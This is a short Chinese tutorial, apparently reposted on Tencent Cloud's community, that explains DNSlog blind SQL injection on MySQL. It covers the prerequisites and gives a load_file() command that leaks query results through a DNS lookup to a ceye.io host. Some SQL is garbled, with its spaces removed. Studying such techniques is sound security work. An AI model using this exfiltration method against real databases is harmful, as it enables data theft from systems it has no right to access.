7.SQL注入之DNSlog盲注

1.什么是DNS在Internet上域名与IP地址之间是一对一(或者多对一)的,域名虽然便于人们记忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,域名解析需要由专门的域名解析服务器来完成,DNS就是进行域名解析的服务器。

用法也很简单,只要有账户,便会给你提供一个二级域名XXX.ceye.io,我们只要将信息放在三级域名那就可以收到信息了。我们只需要下图在红框出写入我们的SQL查询语句,查询的结果就会显示在DNSlog平台的日志里。

注:1红框类容不能含有特殊字符2目标服务器必须是windows服务器(3.就以sql盲注为例。深入理解下DNSlog注入过程:通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。showvariableslike'%secure%';查看load_file()可以读取的磁盘。1、当secure_file_priv为空,就可以读取磁盘的目录。

通过设置my.ini来配置。secure_file_priv=

在mysql命令行执行:selectload_file('\\afanti.wvax23.ceye.io\aaa');其中afanti就是要注入的查询语句查看平台,dnsLog被记录下来。

load_file()函数可以通过dns解析请求。

查看dnslog日志,发现security数据库被查询出来:

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180715A195F900?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励